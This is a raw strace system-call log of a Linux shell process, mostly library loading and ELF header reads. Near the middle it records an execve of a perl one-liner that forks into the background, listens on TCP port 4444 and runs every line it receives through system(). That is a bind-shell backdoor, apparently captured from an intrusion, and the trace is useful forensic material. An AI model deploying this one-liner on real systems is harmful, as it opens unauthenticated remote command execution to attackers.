7593  07:19:29.416665 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d91000

7593  07:19:29.416676 mmap2(0xb7da5000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7da5000

7593  07:19:29.416691 mmap2(0xb7da7000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7da7000

7593  07:19:29.416705 close(1)          = 0

7593  07:19:29.416730 munmap(0xb7f37000, 29913) = 0

7593  07:19:29.416746 open("/etc/ld.so.cache", O_RDONLY) = 1

7593  07:19:29.416759 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7593  07:19:29.416775 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f37000

7593  07:19:29.416863 close(1)          = 0

7593  07:19:29.416875 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7593  07:19:29.416918 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

7593  07:19:29.416932 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7593  07:19:29.417019 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

7593  07:19:29.417036 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d87000

7593  07:19:29.417047 mmap2(0xb7d8f000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d8f000

7593  07:19:29.417063 close(1)          = 0

7593  07:19:29.417075 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7593  07:19:29.417088 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

7593  07:19:29.417105 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7593  07:19:29.417193 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

7593  07:19:29.417209 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d7c000

7593  07:19:29.417220 mmap2(0xb7d85000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d85000

7593  07:19:29.417236 close(1)          = 0

7593  07:19:29.417256 munmap(0xb7f37000, 29913) = 0

7593  07:19:29.417271 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

7593  07:19:29.417312 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

7593  07:19:29.417325 _llseek(1, 0, [0], SEEK_CUR) = 0

7593  07:19:29.417350 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

7593  07:19:29.417367 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f3e000

7593  07:19:29.417377 _llseek(1, 1624, [1624], SEEK_SET) = 0

7593  07:19:29.417392 munmap(0xb7f3e000, 1624) = 0

7593  07:19:29.417402 close(1)          = 0

7593  07:19:29.417429 getpgrp()         = 3831

7593  07:19:29.417439 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

7593  07:19:29.417454 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

7593  07:19:29.417469 brk(0x8101000)    = 0x8101000

7593  07:19:29.417499 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7593  07:19:29.417514 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7593  07:19:29.417528 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7593  07:19:29.417564 brk(0x8102000)    = 0x8102000

7593  07:19:29.417590 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7593  07:19:29.417608 stat64("/sbin/AB", 0xbfaa50f8) = -1 ENOENT (No such file or directory)

7593  07:19:29.417620 stat64("/bin/AB", 0xbfaa50f8) = -1 ENOENT (No such file or directory)

7593  07:19:29.417631 stat64("/usr/sbin/AB", 0xbfaa50f8) = -1 ENOENT (No such file or directory)

7593  07:19:29.417642 stat64("/usr/bin/AB", 0xbfaa50f8) = -1 ENOENT (No such file or directory)

7593  07:19:29.417655 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7593  07:19:29.417669 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7db26f8) = 7594

7594  07:19:29.417711 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7594  07:19:29.417729 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7594  07:19:29.417742 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7594  07:19:29.417753 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7594  07:19:29.417768 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7594  07:19:29.417811 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7594  07:19:29.417825 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7594  07:19:29.417893 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

7594  07:19:29.417907 --- SIGPIPE (Broken pipe) @ 0 (0) ---

7594  07:19:29.417972 exit_group(127)   = ?

7593  07:19:29.444112 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7593  07:19:29.444149 --- SIGCHLD (Child exited) @ 0 (0) ---

7593  07:19:29.444163 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 7594

7593  07:19:29.444193 waitpid(-1, 0xbfaa4d78, WNOHANG) = -1 ECHILD (No child processes)

7593  07:19:29.444217 sigreturn()       = ? (mask now [])

7593  07:19:29.444240 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7593  07:19:29.444255 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7593  07:19:29.444266 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7593  07:19:29.444278 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

7593  07:19:29.444296 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7593  07:19:29.444308 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

7593  07:19:29.444342 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7593  07:19:29.444362 stat64("/sbin/perl", 0xbfaa5128) = -1 ENOENT (No such file or directory)

7593  07:19:29.444374 stat64("/bin/perl", 0xbfaa5128) = -1 ENOENT (No such file or directory)

7593  07:19:29.444386 stat64("/usr/sbin/perl", 0xbfaa5128) = -1 ENOENT (No such file or directory)

7593  07:19:29.444398 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7593  07:19:29.444416 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7593  07:19:29.444441 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7593  07:19:29.444455 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7db26f8) = 7595

7595  07:19:29.444503 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7595  07:19:29.444520 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7595  07:19:29.444544 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7595  07:19:29.444556 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7595  07:19:29.444572 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7595  07:19:29.444587 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7595  07:19:29.444600 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7595  07:19:29.444634 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

7595  07:19:29.444721 brk(0)            = 0x8153000

7595  07:19:29.444741 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7595  07:19:29.444757 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f83000

7595  07:19:29.444772 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7595  07:19:29.444790 open("/etc/ld.so.cache", O_RDONLY) = 1

7595  07:19:29.444803 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7595  07:19:29.444820 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f7b000

7595  07:19:29.444830 close(1)          = 0

7595  07:19:29.444841 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7595  07:19:29.444856 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7595  07:19:29.444870 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7595  07:19:29.444967 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7595  07:19:29.444985 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f77000

7595  07:19:29.444997 mmap2(0xb7f79000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f79000

7595  07:19:29.445014 close(1)          = 0

7595  07:19:29.445032 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7595  07:19:29.445071 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

7595  07:19:29.445086 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

7595  07:19:29.445189 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

7595  07:19:29.445207 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f52000

7595  07:19:29.445218 mmap2(0xb7f75000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f75000

7595  07:19:29.445234 close(1)          = 0

7595  07:19:29.445246 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7595  07:19:29.445260 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

7595  07:19:29.445274 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

7595  07:19:29.445361 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

7595  07:19:29.445377 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f51000

7595  07:19:29.445390 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f39000

7595  07:19:29.445401 mmap2(0xb7f4d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f4d000

7595  07:19:29.445416 mmap2(0xb7f4f000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f4f000

7595  07:19:29.445430 close(1)          = 0

7595  07:19:29.445442 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7595  07:19:29.445458 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7595  07:19:29.445472 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7595  07:19:29.445568 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7595  07:19:29.445587 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dea000

7595  07:19:29.445598 mmap2(0xb7f33000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f33000

7595  07:19:29.445613 mmap2(0xb7f36000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f36000

7595  07:19:29.445626 close(1)          = 0

7595  07:19:29.445638 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7595  07:19:29.445652 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

7595  07:19:29.445667 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

7595  07:19:29.445756 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

7595  07:19:29.445773 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7db8000

7595  07:19:29.445785 mmap2(0xb7dc1000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7dc1000

7595  07:19:29.445799 mmap2(0xb7dc3000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7dc3000

